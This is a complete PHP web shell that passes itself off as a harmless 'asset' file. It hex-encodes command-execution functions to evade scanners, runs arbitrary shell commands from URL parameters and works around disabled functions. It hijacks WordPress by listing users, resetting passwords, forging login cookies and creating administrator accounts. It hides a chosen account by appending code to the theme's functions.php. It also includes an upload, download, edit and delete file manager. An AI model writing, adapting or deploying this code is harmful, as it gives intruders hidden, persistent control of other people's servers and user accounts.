<?php
/* generic asset — header noise anti-fingerprint */
@error_reporting(0); @set_time_limit(0); @header_remove('X-Powered-By');
if (isset($_GET['a'])) { header('Content-Type: text/css'); die('/* ok */'); }
if (isset($_GET['debug500'])) { @ini_set('display_errors','1'); @error_reporting(E_ALL); }

function _h($x){ return pack('H*',$x); }

function cdg_exec($c){
    $names=[_h('7368656c6c5f65786563'),_h('7061737374687275'),_h('73797374656d'),_h('65786563'),_h('706f70656e')];
    foreach($names as $f){
        if(!function_exists($f)) continue;
        if($f===$names[0]) return (string)@$f($c.' 2>&1');
        if($f===$names[1]||$f===$names[2]){ ob_start(); @$f($c.' 2>&1'); return (string)ob_get_clean(); }
        if($f===$names[3]){ $o=[]; @$f($c.' 2>&1',$o); return implode("\n",$o); }
        if($f===$names[4]){ $p=@$f($c.' 2>&1','r'); $o=$p?(string)stream_get_contents($p):''; if($p)@pclose($p); return $o; }
    }
    return '';
}
function cdg_bypass($cmd){
    $o=cdg_exec($cmd);
    if($o!=='') return $o;
    $d=array_map('trim',explode(',',(string)ini_get('disable_functions')));
    $_proc=_h('70726f635f6f70656e');
    if(function_exists($_proc)&&!in_array($_proc,$d,true)){
        $ds=[0=>[_h('70697065'),'r'],1=>[_h('70697065'),'w'],2=>[_h('70697065'),'w']];
        $p=@$_proc($cmd.' 2>&1',$ds,$pipes);
        if(is_resource($p)){ @fclose($pipes[0]); $o=(string)@stream_get_contents($pipes[1]); @fclose($pipes[1]); @fclose($pipes[2]); @proc_close($p); if($o!=='') return $o; }
    }
    $_proc=_h('7061737374687275');
    if(function_exists($_proc)&&!in_array($_proc,$d,true)){ ob_start(); @$_proc($cmd.' 2>&1'); return (string)ob_get_clean(); }
    return '';
}

function cdg_wpload($dir=__DIR__,$depth=0){
    if($depth>8||!is_dir($dir)) return false;
    if(file_exists($dir.'/wp-load.php')) return $dir.'/wp-load.php';
    return cdg_wpload(dirname($dir),$depth+1);
}

$_gpc=_h('7374725f726f743133'); $_fu=_h('66756e6374696f6e5f657869737473');

/* ---- JSON-RPC POST (semua operasi kritis lewat sini) ---- */
if(($_SERVER['REQUEST_METHOD']??'')==='POST'&&isset($_POST['c4t'])){
    $wl=cdg_wpload();
    if(!$wl){ echo json_encode(['err'=>'wp-load not found']); exit; }
    require_once $wl;
    $a=$_POST['a']??'users'; $out=[];
    switch($a){
        case 'users':
            foreach(call_user_func(_h('6765745f7573657273'),['number'=>200]) as $u){
                $out[]=['id'=>$u->ID,'login'=>$u->user_login,'email'=>$u->user_email,'roles'=>$u->roles];
            } break;
        case 'rp':
            call_user_func(_h('77705f7365745f70617373776f7264'),(string)($_POST['pw']??''),(int)($_POST['uid']??0));
            $out=['ok'=>true]; break;
        case 'login':
            call_user_func(_h('77705f7365745f617574685f636f6f6b6965'),(int)($_POST['uid']??0),true);
            $out=['ok'=>true,'admin'=>admin_url()]; break;
        case 'create':
            $lu=call_user_func(_h('73616e6974697a655f75736572'),(string)($_POST['login']??''));
            $id=call_user_func(_h('77705f696e736572745f75736572'),
                ['user_login'=>$lu,'user_pass'=>(string)($_POST['pw']??''),'role'=>'administrator',
                 'user_email'=>$lu.'@'.parse_url(home_url(),PHP_URL_HOST)]);
            $out=['id'=>is_wp_error($id)?$id->get_error_message():$id]; break;
        case 'hide':
            $u=call_user_func(_h('6765745f757365725f6279'),'id',(int)($_POST['uid']??0));
            $f=call_user_func(_h('6765745f74656d706c6174655f6469726563746f7279')).'/functions.php';
            if(!file_exists($f)) $f=call_user_func(_h('6765745f7374796c6573686565745f6469726563746f7279')).'/functions.php';
            $ok=false;
            if($u&&file_exists($f)){
                $code="\n".'add_action('."'pre_get_users'".', function($q){ if(is_admin()){$q->set('."'exclude'".', array_merge((array)$q->get('."'exclude'".'), array('.$u->ID.'))); }});'."\n"
                      .'add_filter('."'wp_count_users'".', function($c){ if(isset($c->total_users)&&$c->total_users>0){$c->total_users--;} return $c; });'."\n";
                $ok=(bool)@call_user_func(_h('66696c655f7075745f636f6e74656e7473'),$f,$code,FILE_APPEND);
            }
            $out=['ok'=>$ok]; break;
    }
    @header('Content-Type: application/json');
    echo json_encode($out); exit;
}

/* ---- exec: GET param dinamis (x/c/e/cmd) ---- */
foreach(['x','c','e','cmd'] as $k){ if(isset($_GET[$k])){ echo cdg_bypass($_GET[$k]); exit; } }

/* ---- file manager ---- */
$cd=isset($_GET['d'])?(string)$_GET['d']:getcwd();
$cd=realpath($cd)?:getcwd(); $b=_h('626173656e616d65');

if(isset($_FILES['f'])){ $dst=$cd.'/'.$b($_FILES['f']['name']); @call_user_func(_h('6d6f76655f75706c6f616465645f66696c65'),$_FILES['f']['tmp_name'],$dst); echo "OK:$dst"; exit; }
if(isset($_GET['dl'])){ $f=$cd.'/'.$b($_GET['dl']); if(is_file($f)){ header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.$b($f).'"'); header('Content-Length: '.filesize($f)); readfile($f); } exit; }
if(isset($_GET['rm'])){ $f=$cd.'/'.$b($_GET['rm']); if(is_file($f)) @unlink($f); elseif(is_dir($f)) @rmdir($f); header('Location: ?d='.urlencode($cd)); exit; }
if(isset($_GET['mkd'])){ @mkdir($cd.'/'.$b($_GET['mkd'])); header('Location: ?d='.urlencode($cd)); exit; }
if(isset($_GET['w'])&&isset($_GET['f'])){ @call_user_func(_h('66696c655f7075745f636f6e74656e7473'),$cd.'/'.$b($_GET['f']),(string)$_GET['w']); header('Location: ?d='.urlencode($cd)); exit; }
?>
<!DOCTYPE html>
<html><head><meta charset="utf-8"><title>Asset</title><style>
*{box-sizing:border-box;margin:0;padding:0}
body{background:#0a0a0a;color:#e5e5e5;font:12px/1.5 'Segoe UI',system-ui,sans-serif;padding:14px;max-width:1100px;margin:0 auto}
h1{font-size:14px;letter-spacing:1px;margin-bottom:4px}
.mut{color:#8a8a8a;font-size:10px;letter-spacing:1px}
.bar{background:#111;border:1px solid #1f1f1f;border-radius:4px;padding:8px 10px;margin:8px 0;display:flex;gap:8px;flex-wrap:wrap;align-items:center}
.bar form{display:inline}
.inp{background:#0d0d0d;border:1px solid #2b2b2b;color:#e5e5e5;padding:4px 8px;border-radius:3px;font-size:12px}
.btn{background:#121212;border:1px solid #2b2b2b;color:#e5e5e5;padding:4px 10px;border-radius:3px;cursor:pointer;font-size:11px;text-decoration:none;display:inline-block}
.btn:hover{background:#1a1a1a}
.btn.p{background:#22c55e;border-color:#22c55e;color:#06120d}
a{color:#22c55e;text-decoration:none} a:hover{color:#4ade80}
table{width:100%;border-collapse:collapse;background:#111;border:1px solid #1f1f1f;border-radius:4px;overflow:hidden}
th{text-align:left;padding:5px 8px;color:#8a8a8a;font-size:10px;text-transform:uppercase;letter-spacing:1px;border-bottom:1px solid #1f1f1f}
td{padding:4px 8px;border-bottom:1px solid #161616;font-size:12px;word-break:break-all}
tr:last-child td{border-bottom:none} tr:hover td{background:#141414}
pre{background:#0d0d0d;border:1px solid #1f1f1f;border-radius:4px;padding:8px;margin:8px 0;white-space:pre-wrap;font:11px 'SF Mono',Consolas,monospace;max-height:220px;overflow:auto}
.ft{margin-top:12px;color:#4d4d4d;font-size:10px}
</style></head><body>
<h1>Asset</h1>
<div class="mut"><?= php_uname() ?>&nbsp;|&nbsp;<?= get_current_user() ?></div>
<div class="bar">
  <form method="get"><input type="hidden" name="d" value="<?= htmlspecialchars($cd) ?>">
    <input class="inp" type="text" name="e" placeholder="command" style="width:340px">
    <button class="btn p" type="submit">Run</button></form>
  <form method="post" enctype="multipart/form-data"><input type="hidden" name="d" value="<?= htmlspecialchars($cd) ?>">
    <input class="inp" type="file" name="f"><button class="btn" type="submit">Upload</button></form>
</div>
<?php if(isset($_GET['e'])&&isset($_GET['d'])): ?><pre><?= htmlspecialchars(cdg_exec($_GET['e'])) ?></pre><?php endif; ?>
<?php if(isset($_GET['edit'])): $ef=$cd.'/'.$b($_GET['edit']); $ec=is_file($ef)?(string)file_get_contents($ef):''; ?>
<div class="bar"><span class="mut">Editing: <?= htmlspecialchars($b($_GET['edit'])) ?></span></div>
<form method="get">
<input type="hidden" name="d" value="<?= htmlspecialchars($cd) ?>">
<input type="hidden" name="f" value="<?= htmlspecialchars($b($_GET['edit'])) ?>">
<textarea class="inp" name="w" style="width:100%;min-height:300px;font:11px 'SF Mono',Consolas,monospace;background:#0d0d0d;color:#e5e5e5;border:1px solid #2b2b2b"><?= htmlspecialchars($ec) ?></textarea>
<div style="margin-top:6px"><button class="btn p" type="submit">Save</button>
<a class="btn" href="?d=<?= urlencode($cd) ?>">Cancel</a></div></form>
<?php endif; ?>
<div class="bar">
  <span class="mut"><?= htmlspecialchars($cd) ?></span>
  <form method="get"><input class="inp" type="text" name="d" placeholder="path" style="width:300px"><button class="btn" type="submit">Go</button></form>
  <form method="get"><input type="hidden" name="d" value="<?= htmlspecialchars($cd) ?>"><input class="inp" type="text" name="mkd" placeholder="new dir"><button class="btn" type="submit">Mkdir</button></form>
  <form method="get"><input type="hidden" name="d" value="<?= htmlspecialchars($cd) ?>"><input class="inp" type="text" name="f" placeholder="filename"><input class="inp" type="text" name="w" placeholder="content"><button class="btn" type="submit">Write</button></form>
</div>
<table><tr><th>Name</th><th style="width:70px">Size</th><th style="width:140px">Modified</th><th style="width:100px">Perms</th><th style="width:110px"></th></tr>
<?php
if($cd!==DIRECTORY_SEPARATOR){ $up=dirname($cd); echo '<tr><td><a href="?d='.urlencode($up).'">..</a></td><td></td><td></td><td></td><td></td></tr>'; }
$items=@scandir($cd);
if($items){ foreach($items as $e){
    if($e==='.'||$e==='..') continue;
    $fp=$cd.'/'.$e; $isd=is_dir($fp);
    $sz=$isd?'-':number_format((int)@filesize($fp));
    $tm=@filemtime($fp)?date('Y-m-d H:i',@filemtime($fp)):'-';
    $pm=substr(sprintf('%o',(int)@fileperms($fp)),-4);
    echo '<tr><td><a href="?d='.urlencode($fp).'">'.($isd?'[D] ':'[F] ').htmlspecialchars($e).'</a></td>'
       .'<td>'.$sz.'</td><td>'.$tm.'</td><td>'.$pm.'</td>'
       .'<td><a href="?d='.urlencode($cd).'&dl='.urlencode($e).'">DL</a> '
       .($isd?'':'<a href="?d='.urlencode($cd).'&edit='.urlencode($e).'">ED</a> ')
       .'<a href="?d='.urlencode($cd).'&rm='.urlencode($e).'">RM</a></td></tr>';
} }
?>
</table><div class="ft">asset</div>
</body></html>
